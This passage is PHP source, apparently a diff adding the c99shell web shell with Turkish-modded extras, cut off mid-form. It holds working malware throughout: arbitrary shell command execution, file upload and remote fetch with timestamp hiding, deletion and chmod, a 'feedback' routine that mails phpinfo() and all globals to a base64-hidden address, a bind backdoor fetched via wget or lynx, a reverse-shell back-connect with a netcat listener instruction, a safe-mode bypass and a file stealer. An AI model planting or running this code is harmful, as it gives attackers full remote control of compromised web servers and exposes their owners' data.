DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; + } + echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> + <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> + <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; + echo "<center>base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} + else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} + echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; + } + echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; + $c = strlen($encoder_input); + for($i=0;$i<$c;$i++) + { + $hex = dechex(ord($encoder_input[$i])); + if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} + elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} + } + echo "\" readonly><br></center></form>"; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} + else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; + } + else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} +} +if ($act == "search") +{ + echo "<b>Search in file-system:</b><br>"; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "<form method=POST> +<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> +<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text +<br><br><input type=submit name=submit value=\"Search\"></form>"; + if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=submit name=submit value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + } + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "<b>Result of execution this command</b>:<br>"; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; + $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + else + { + $type = "DIR"; + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; + if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} + else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"> + <script> + function ls_setcheckboxall(status) + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> + <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=act><option value=\"".$act."\">With selected:</option>"; + echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; + echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; + if ($usefsbuff) + { + echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; + echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; + echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; + } + echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; + echo "</form>"; + } +} +if ($act == "tools") +{ + + + + + + + ?> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57 </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"> + </div> + <form action="<?php echo $surl; ?>"> +<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form> + </td> + <td width="50%" height="83" valign="top"><center> + <center> + + + <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form> +Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br> + + </center> + </td> +</tr></TABLE> + + + + + + + +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"><b>Error_Log SAfe Mode Bypass By Psych0 ;)</b> + <form action="<?php echo $surl; ?>" method="POST"> + <input type=hidden name=act value=tools> + <textarea name="erorr" cols=100 rows=10></textarea></br> + <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84> + <input type="submit" value="Write 2 File !!"> + + </form> + + + + + + + + + + + + </div> + + </td> + <td width="50%" height="83" valign="top"><center> + <center> + <form action="<?php echo $surl; ?>" method="POST"> + <input type=hidden name=act value=tools> + Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500 value=""><br><br> +Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br> +<input type=submit class='stealthSubmit' Value='Dosyayi 